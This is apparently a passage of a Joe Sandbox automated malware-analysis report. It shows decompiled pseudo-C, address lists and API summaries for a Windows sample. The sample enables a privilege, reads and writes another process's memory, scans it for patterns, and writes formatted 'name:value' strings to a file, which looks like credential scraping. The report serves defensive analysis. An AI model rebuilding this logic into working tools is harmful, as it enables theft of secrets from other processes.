				_t27 = E00F620B7( *0xf6c004,  *0xf6c00c); // executed
				 *((intOrPtr*)(_t52 - 0x20)) = _t27;
				if( *(_t52 - 0x1c) == 0) {
					E00F64F69(_t27); // executed
				}
				E00F64F95();
				 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
				return E00F65955( *((intOrPtr*)(_t52 - 0x20)));
			}














    0x00f63a0b
    0x00f63a0b
    0x00f63a0b
    0x00f63a0b
    0x00f63a0d
    0x00f63a12
    0x00f63a19
    0x00f63a1f
    0x00f63a26
    0x00f63a26
    0x00f63a31
    0x00f63a38
    0x00f63a3f
    0x00f63a44
    0x00f63a4e
    0x00000000
    0x00f63a50
    0x00f63a55
    0x00f63a5c
    0x00000000
    0x00f63a5e
    0x00f63a5e
    0x00f63a65
    0x00000000
    0x00f63a67
    0x00f63a69
    0x00f63a6f
    0x00f63a6f
    0x00f63a72
    0x00f63a72
    0x00f63a65
    0x00f63a5c
    0x00f63a3a
    0x00f63a3a
    0x00f63a3a
    0x00f63a3a
    0x00f63a7c
    0x00f63a80
    0x00f63a85
    0x00f63a8d
    0x00f63a91
    0x00f63a96
    0x00f63a97
    0x00f63a9c
    0x00f63a9f
    0x00f63aa4
    0x00f63aa6
    0x00f63aa8
    0x00f63aaa
    0x00f63aaf
    0x00f63ab6
    0x00f63ac0
    0x00f63ac5
    0x00f63aca
    0x00f63acc
    0x00f63ace
    0x00f63ad0
    0x00f63ad5
    0x00f63ad6
    0x00f63adb
    0x00f63add
    0x00f63adf
    0x00f63ae1
    0x00f63ae6
    0x00f63ae9
    0x00f63aef
    0x00f63af1
    0x00f63af3
    0x00f63af4
    0x00f63af9
    0x00f63afa
    0x00f63aff
    0x00f63b04
    0x00f63b11
    0x00f63b19
    0x00f63b1f
    0x00f63b22
    0x00f63b22
    0x00f63b27
    0x00f63b5c
    0x00f63b6b

    APIs
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00F69DC8,00000014), ref: 00F63A26
      • Part of subcall function 00F658F2: HeapCreate.KERNEL32(00000000,00001000,00000000,00F63A7A,00F69DC8,00000014), ref: 00F658FB
      • Part of subcall function 00F6488C: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00F63A8B,00F69DC8,00000014), ref: 00F64894
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F648B6
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648C3
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648D0
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsFree,?,00F63A8B,00F69DC8,00000014), ref: 00F648DD
      • Part of subcall function 00F6488C: TlsAlloc.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6492D
      • Part of subcall function 00F6488C: TlsSetValue.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F64948
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64963
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64970
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6497D
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6498A
      • Part of subcall function 00F6488C: DecodePointer.KERNEL32(00F6475D,?,00F63A8B,00F69DC8,00000014), ref: 00F649AB
      • Part of subcall function 00F6488C: DecodePointer.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F649DA
      • Part of subcall function 00F6488C: GetCurrentThreadId.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F649EC
    • __RTC_Initialize.LIBCMT ref: 00F63A97
      • Part of subcall function 00F65661: GetStartupInfoW.KERNEL32(?), ref: 00F6566E
      • Part of subcall function 00F65661: GetFileType.KERNEL32(?), ref: 00F657A1
      • Part of subcall function 00F65661: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 00F657D7
      • Part of subcall function 00F65661: GetStdHandle.KERNEL32(-000000F6), ref: 00F6582B
      • Part of subcall function 00F65661: GetFileType.KERNEL32(00000000), ref: 00F6583D
      • Part of subcall function 00F65661: InitializeCriticalSectionAndSpinCount.KERNEL32(-00F6CD94,00000FA0), ref: 00F6586B
      • Part of subcall function 00F65661: SetHandleCount.KERNEL32 ref: 00F65894
    • __amsg_exit.LIBCMT ref: 00F63AAA
    • GetCommandLineW.KERNEL32(00F69DC8,00000014), ref: 00F63AB0
      • Part of subcall function 00F65609: GetEnvironmentStringsW.KERNEL32(00000000,00F63AC0), ref: 00F6560C
      • Part of subcall function 00F65609: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F65648
      • Part of subcall function 00F6555B: GetModuleFileNameW.KERNEL32(00000000,00F6C660,00000104), ref: 00F6557B
      • Part of subcall function 00F6555B: _wparse_cmdline.LIBCMT ref: 00F655A5
      • Part of subcall function 00F6555B: _wparse_cmdline.LIBCMT ref: 00F655E7
    • __amsg_exit.LIBCMT ref: 00F63AD0
      • Part of subcall function 00F65329: _wcslen.LIBCMT ref: 00F65349
      • Part of subcall function 00F65329: _wcslen.LIBCMT ref: 00F65381
    • __amsg_exit.LIBCMT ref: 00F63AE1
      • Part of subcall function 00F64D92: __initterm_e.LIBCMT ref: 00F64DC8
    • __amsg_exit.LIBCMT ref: 00F63AF4
      • Part of subcall function 00F620B7: RtlGetNtVersionNumbers.NTDLL(00F6CFD0,00F6CFCC,00F6CFD4), ref: 00F620E0
      • Part of subcall function 00F620B7: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
      • Part of subcall function 00F620B7: CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F631AB, Relevance: 9.1, APIs: 6, Instructions: 85
    C-Code - Quality: 100%
    			E00F631AB(void* __eax) {
				signed int _v8;
				long _v12;
				short _v532;
				void* __esi;
				int _t25;
				void* _t27;
				void* _t30;
				intOrPtr _t33;
				signed int _t36;
				void _t40;
				void* _t46;
				void* _t47;
				signed int _t48;
				void* _t50;
				void* _t52;

				_t47 = __eax;
				_v8 = 1;
				_v12 = 0x208;
				_t25 = GetComputerNameW( &_v532,  &_v12); // executed
				if(_t25 == 0) {
					L5:
					if( *((intOrPtr*)(_t47 + 0x30)) == 0) {
						L10:
						_v8 = 0;
					} else {
						_t11 = _t47 + 0x14; // 0x30
						_t33 =  *_t11;
						if(_t33 != 2 && _t33 != 0xa && _t33 != 0xb && _t33 != 0xc) {
							goto L10;
						}
					}
					if(_v8 != 0) {
						_t14 = _t47 + 0xc; // 0x8
						_t27 = E00F63168( *_t14);
						_t50 = _t27;
						if(_t50 != 0) {
							_t15 = _t27 + 2; // 0x2
							_t46 = _t15;
							do {
								_t40 =  *_t27;
								_t27 = _t27 + 2;
							} while (_t40 != 0);
							_t48 = _t27 - _t46 >> 1;
							_t30 = E00F63746(_t50, 0x24);
							_t17 = _t48 * 2; // -2
							if(_t50 + _t17 - 2 == _t30 || E00F63746(_t50, 0x40) != 0) {
								_v8 = _v8 & 0x00000000;
							}
							LocalFree(_t50);
						}
					}
				} else {
					_t5 = _t47 + 0x10; // 0x2c
					_t52 = E00F63168( *_t5);
					if(_t52 == 0) {
						goto L5;
					} else {
						_t36 = StrCmpIW(_t52,  &_v532); // executed
						if(_t36 == 0) {
							_v8 = _v8 & _t36;
						}
						LocalFree(_t52);
						if(_v8 != 0) {
							goto L5;
						}
					}
				}
				return _v8;
			}


















    0x00f631b7
    0x00f631c4
    0x00f631cb
    0x00f631d2
    0x00f631e0
    0x00f6320e
    0x00f63213
    0x00f6322c
    0x00f6322c
    0x00f63215
    0x00f63215
    0x00f63215
    0x00f6321b
    0x00000000
    0x00000000
    0x00f6321b
    0x00f63232
    0x00f63234
    0x00f63237
    0x00f6323c
    0x00f63240
    0x00f63242
    0x00f63242
    0x00f63245
    0x00f63245
    0x00f63248
    0x00f6324b
    0x00f63257
    0x00f63259
    0x00f63260
    0x00f63266
    0x00f63276
    0x00f63276
    0x00f6327b
    0x00f6327b
    0x00f63240
    0x00f631e2
    0x00f631e2
    0x00f631ea
    0x00f631ee
    0x00000000
    0x00f631f0
    0x00f631f8
    0x00f63200
    0x00f63202
    0x00f63202
    0x00f63206
    0x00f6320c
    0x00000000
    0x00000000
    0x00f6320c
    0x00f631ee
    0x00f63284

    APIs
    • GetComputerNameW.KERNEL32(?,?,00F69CC4,?,0000A2A4), ref: 00F631D2
    • StrCmpIW.SHLWAPI(00000000,?), ref: 00F631F8
    • LocalFree.KERNEL32(00000000), ref: 00F63206
      • Part of subcall function 00F63168: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
      • Part of subcall function 00F63168: GetProcAddress.KERNEL32(00000000), ref: 00F63189
    • _wcschr.LIBCMT ref: 00F63259
    • _wcschr.LIBCMT ref: 00F6326B
    • LocalFree.KERNEL32(00000000), ref: 00F6327B
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F6134E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125
    C-Code - Quality: 77%
    			E00F6134E(signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _t43;
				signed int _t44;
				signed int _t46;
				_Unknown_base(*)()* _t48;
				signed int _t49;
				signed int _t51;
				signed int _t54;
				signed int _t57;
				signed int _t59;
				intOrPtr _t60;
				signed int _t61;
				intOrPtr _t77;
				signed int _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr* _t85;

				_t85 = _a12;
				_t43 =  *((intOrPtr*)(_t85 + 8));
				_t60 =  *_t85;
				_v12 = _t60 + _t43;
				_v28 = 0;
				_v24 = 0xf6cd30;
				_v20 = _t43;
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)))) != 0) {
					L6:
					_t61 = _a4;
				} else {
					_t72 =  *((intOrPtr*)(_t85 + 4));
					_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4))));
					if(_t77 == 0) {
						_t46 = _a8 + _t60;
						__eflags = _t46;
						while(1) {
							__eflags = _t46 - _v12;
							if(__eflags > 0) {
								break;
							}
							asm("repe cmpsb");
							_t85 = _a12;
							_t80 = 0 | __eflags == 0x00000000;
							_t60 = _t60 + 1;
							_t46 = _t46 + 1;
							_v8 = _t80;
							__eflags = _t80;
							if(_t80 == 0) {
								continue;
							}
							break;
						}
						_t61 = _t60 - 1;
					} else {
						_t81 = _t77 - 1;
						if(_t81 == 0) {
							L11:
							_t48 = GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"); // executed
							_t49 =  *_t48(0x40, _t43); // executed
							_v28 = _t49;
							__eflags = _t49;
							if(_t49 == 0) {
								goto L6;
							} else {
								_t51 = E00F61149( &_v28, _t85,  *((intOrPtr*)(_t85 + 8))); // executed
								__eflags = _t51;
								if(_t51 == 0) {
									L15:
									_t61 = _a4;
								} else {
									_push(0);
									_t54 = E00F6134E(_a4, _a8,  &_v28);
									_v8 = _t54;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L15;
									} else {
										_t61 =  *_t85 - _v28 + _v16;
									}
								}
								LocalFree(_v28);
							}
						} else {
							_t82 = _t81 - 1;
							if(_t82 == 0) {
								_t57 = E00F6175D( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)))), _t60, _t43);
								_v28 = _t57;
								__eflags = _t57;
								if(_t57 == 0) {
									goto L6;
								} else {
									_push(0);
									_t59 = E00F6134E(_a4, _a8,  &_v28);
									_v8 = _t59;
									__eflags = _t59;
									if(_t59 == 0) {
										goto L6;
									} else {
										_t61 =  *_t85 - _v28 + _v16;
									}
								}
							} else {
								_t83 = _t82 - 1;
								if(_t83 == 0 || _t83 == 3) {
									goto L11;
								} else {
									goto L6;
								}
							}
						}
					}
				}
				_t44 = _v8;
				asm("sbb ecx, ecx");
				 *(_t85 + 0xc) =  ~_t44 & _t61;
				return _t44;
			}


























    0x00f61357
    0x00f6135a
    0x00f6135d
    0x00f61364
    0x00f6136d
    0x00f61370
    0x00f61377
    0x00f6137a
    0x00f6137d
    0x00f61382
    0x00f6139f
    0x00f6139f
    0x00f61384
    0x00f61384
    0x00f61389
    0x00f6138b
    0x00f6145d
    0x00f6145d
    0x00f6145f
    0x00f6145f
    0x00f61462
    0x00000000
    0x00000000
    0x00f61470
    0x00f61472
    0x00f61475
    0x00f61478
    0x00f61479
    0x00f6147a
    0x00f6147d
    0x00f6147f
    0x00000000
    0x00000000
    0x00000000
    0x00f6147f
    0x00f61481
    0x00f61391
    0x00f61391
    0x00f61392
    0x00f613ee
    0x00f61402
    0x00f61408
    0x00f6140a
    0x00f6140d
    0x00f6140f
    0x00000000
    0x00f61411
    0x00f61419
    0x00f61421
    0x00f61423
    0x00f61449
    0x00f61449
    0x00f61425
    0x00f61425
    0x00f61430
    0x00f61438
    0x00f6143b
    0x00f6143d
    0x00000000
    0x00f6143f
    0x00f61444
    0x00f61444
    0x00f6143d
    0x00f6144f
    0x00f6144f
    0x00f61394
    0x00f61394
    0x00f61395
    0x00f613bc
    0x00f613c3
    0x00f613c6
    0x00f613c8
    0x00000000
    0x00f613ca
    0x00f613ca
    0x00f613d5
    0x00f613dd
    0x00f613e0
    0x00f613e2
    0x00000000
    0x00f613e4
    0x00f613e9
    0x00f613e9
    0x00f613e2
    0x00f61397
    0x00f61397
    0x00f61398
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f61398
    0x00f61395
    0x00f61392
    0x00f6138b
    0x00f613a2
    0x00f613a9
    0x00f613ad
    0x00f613b4

    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63640, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
    C-Code - Quality: 93%
    			E00F63640(void* __eax, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				void* __edi;
				void* __esi;
				void* _t17;
				void* _t18;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				long _t29;
				intOrPtr* _t34;
				signed int _t44;
				void* _t46;
				intOrPtr _t50;

				_t46 = (_t44 & 0xfffffff8) - 0x14;
				_t34 = _a4;
				_t31 =  *_t34;
				_v12 = 0;
				_v8 = 0xf6cd30;
				_v20 = 0;
				_v16 =  *((intOrPtr*)( *_t34));
				_t50 =  *0xf6bb58; // 0x0
				if(_t50 != 0) {
					L3:
					_t17 =  *0xf6cd84; // 0x0
					_t28 =  *0xf6cd88; // 0x0
					_v20 = _t17;
					_t29 = _t28 + 0x18; // executed
					_t18 = E00F63594( *((intOrPtr*)(_t34 + 8)),  &_v20); // executed
					_v20 = _t18;
					if(_t18 != 0) {
						_push(_t29);
						_push(0x40);
						_t18 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
						_v20 = _t18;
						if(_t18 != 0) {
							_t23 = E00F61149( &_v20,  &_v20, _t29); // executed
							if(_t23 != 0) {
								_t24 =  *0xf6cd88; // 0x0
								_t25 = _t24 + _v20;
								if(_t24 + _v20 != 0) {
									E00F63303(_t25); // executed
								}
							}
							_t18 = LocalFree(_v20);
						}
					}
					goto L9;
				} else {
					_t18 = E00F634D4(_t31, 0xf6bb40, 0xf6bba8, 5, 0xf6cd84, 0, 0xf6cd88); // executed
					_t46 = _t46 + 0x14;
					if(_t18 == 0) {
						L9:
						return _t18;
					}
					goto L3;
				}
			}



















    0x00f63648
    0x00f6364e
    0x00f63651
    0x00f63655
    0x00f63659
    0x00f63661
    0x00f63667
    0x00f6366b
    0x00f63671
    0x00f63696
    0x00f63696
    0x00f6369b
    0x00f636a8
    0x00f636ac
    0x00f636af
    0x00f636b4
    0x00f636ba
    0x00f636bc
    0x00f636bd
    0x00f636d6
    0x00f636d8
    0x00f636de
    0x00f636e9
    0x00f636f3
    0x00f636f5
    0x00f636fa
    0x00f636fe
    0x00f63700
    0x00f63700
    0x00f636fe
    0x00f63709
    0x00f63709
    0x00f636de
    0x00000000
    0x00f63673
    0x00f6368a
    0x00f6368f
    0x00f63694
    0x00f6370f
    0x00f63715
    0x00f63715
    0x00000000
    0x00f63694

    APIs
      • Part of subcall function 00F63594: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
      • Part of subcall function 00F63594: GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F63594: LocalFree.KERNEL32(?), ref: 00F63634
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000018), ref: 00F636C9
    • GetProcAddress.KERNEL32(00000000), ref: 00F636D0
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63709
      • Part of subcall function 00F63303: StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
      • Part of subcall function 00F63303: wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
      • Part of subcall function 00F63303: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
      • Part of subcall function 00F63303: GetProcAddress.KERNEL32(00000000), ref: 00F6346E
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F6347B
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F63489
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F63497
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634A9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634B9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634C9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63642, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
    C-Code - Quality: 93%
    			E00F63642(intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t16;
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t26;
				long _t27;
				intOrPtr* _t32;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_t41 = (_t39 & 0xfffffff8) - 0x14;
				_t32 = _a4;
				_t29 =  *_t32;
				_v12 = 0;
				_v8 = 0xf6cd30;
				_v20 = 0;
				_v16 =  *((intOrPtr*)( *_t32));
				_t43 =  *0xf6bb58; // 0x0
				if(_t43 != 0) {
					L2:
					_t15 =  *0xf6cd84; // 0x0
					_t26 =  *0xf6cd88; // 0x0
					_t36 =  &_v20;
					_v20 = _t15;
					_t27 = _t26 + 0x18; // executed
					_t16 = E00F63594( *((intOrPtr*)(_t32 + 8)),  &_v20); // executed
					_v20 = _t16;
					if(_t16 != 0) {
						_push(_t27);
						_push(0x40);
						_t16 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
						_v20 = _t16;
						if(_t16 != 0) {
							_t21 = E00F61149( &_v20, _t36, _t27); // executed
							if(_t21 != 0) {
								_t22 =  *0xf6cd88; // 0x0
								_t23 = _t22 + _v20;
								if(_t22 + _v20 != 0) {
									E00F63303(_t23); // executed
								}
							}
							_t16 = LocalFree(_v20);
						}
					}
					L8:
					return _t16;
				}
				_t16 = E00F634D4(_t29, 0xf6bb40, 0xf6bba8, 5, 0xf6cd84, 0, 0xf6cd88); // executed
				_t41 = _t41 + 0x14;
				if(_t16 == 0) {
					goto L8;
				}
				goto L2;
			}



















    0x00f63648
    0x00f6364e
    0x00f63651
    0x00f63655
    0x00f63659
    0x00f63661
    0x00f63667
    0x00f6366b
    0x00f63671
    0x00f63696
    0x00f63696
    0x00f6369b
    0x00f636a4
    0x00f636a8
    0x00f636ac
    0x00f636af
    0x00f636b4
    0x00f636ba
    0x00f636bc
    0x00f636bd
    0x00f636d6
    0x00f636d8
    0x00f636de
    0x00f636e9
    0x00f636f3
    0x00f636f5
    0x00f636fa
    0x00f636fe
    0x00f63700
    0x00f63700
    0x00f636fe
    0x00f63709
    0x00f63709
    0x00f636de
    0x00f6370f
    0x00f63715
    0x00f63715
    0x00f6368a
    0x00f6368f
    0x00f63694
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 00F63594: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
      • Part of subcall function 00F63594: GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F63594: LocalFree.KERNEL32(?), ref: 00F63634
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000018), ref: 00F636C9
    • GetProcAddress.KERNEL32(00000000), ref: 00F636D0
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63709
      • Part of subcall function 00F63303: StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
      • Part of subcall function 00F63303: wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
      • Part of subcall function 00F63303: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
      • Part of subcall function 00F63303: GetProcAddress.KERNEL32(00000000), ref: 00F6346E
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F6347B
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F63489
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F63497
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634A9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634B9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634C9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63594, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66
    C-Code - Quality: 93%
    			E00F63594(intOrPtr* __edi, void** __esi) {
				char _v8;
				intOrPtr _v12;
				void _v16;
				intOrPtr _v20;
				void* _v24;
				void* _t25;
				void* _t28;
				void* _t29;
				void _t31;
				void* _t34;
				void _t35;
				void _t38;
				intOrPtr* _t40;
				intOrPtr* _t41;
				void* _t42;
				void* _t43;

				_t41 = __esi;
				_t40 = __edi;
				_push(0x18);
				_push(0x40);
				_v16 =  &_v8;
				_t35 = 0;
				_v12 = 0xf6cd30;
				_v24 = 0;
				_v20 = 0xf6cd30;
				_t25 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
				_v24 = _t25;
				if(_t25 != 0) {
					_t28 = E00F61149( &_v16, __esi, 4); // executed
					_t43 = _t42 + 0xc;
					if(_t28 == 0) {
						L9:
						_t29 = _v24;
					} else {
						_t31 = _v8;
						_v16 = _t31;
						_v12 =  *((intOrPtr*)(__esi + 4));
						if(_t31 !=  *((intOrPtr*)(__esi))) {
							while(1) {
								_t34 = E00F61149( &_v24,  &_v16, 0x18); // executed
								_t43 = _t43 + 0xc;
								if(_t34 == 0) {
									goto L9;
								}
								_t29 = _v24;
								if( *_t40 !=  *((intOrPtr*)(_t29 + 0x10)) ||  *((intOrPtr*)(_t40 + 4)) !=  *((intOrPtr*)(_t29 + 0x14))) {
									_t38 =  *_t29;
									_v16 = _t38;
									if(_t38 !=  *_t41) {
										continue;
									} else {
									}
								} else {
									_t35 = _v16;
								}
								goto L10;
							}
						}
						goto L9;
					}
					L10:
					LocalFree(_t29);
				}
				return _t35;
			}



















    0x00f63594
    0x00f63594
    0x00f6359b
    0x00f6359d
    0x00f635a2
    0x00f635af
    0x00f635b6
    0x00f635b9
    0x00f635bc
    0x00f635cc
    0x00f635ce
    0x00f635d3
    0x00f635dc
    0x00f635e1
    0x00f635e6
    0x00f63630
    0x00f63630
    0x00f635e8
    0x00f635e8
    0x00f635ee
    0x00f635f1
    0x00f635f6
    0x00f635f8
    0x00f63602
    0x00f63607
    0x00f6360c
    0x00000000
    0x00000000
    0x00f63610
    0x00f63616
    0x00f63620
    0x00f63622
    0x00f63627
    0x00000000
    0x00000000
    0x00f63629
    0x00f6362b
    0x00f6362b
    0x00f6362b
    0x00000000
    0x00f63616
    0x00f635f8
    0x00000000
    0x00f635f6
    0x00f63633
    0x00f63634
    0x00f63634
    0x00f6363e

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
    • GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
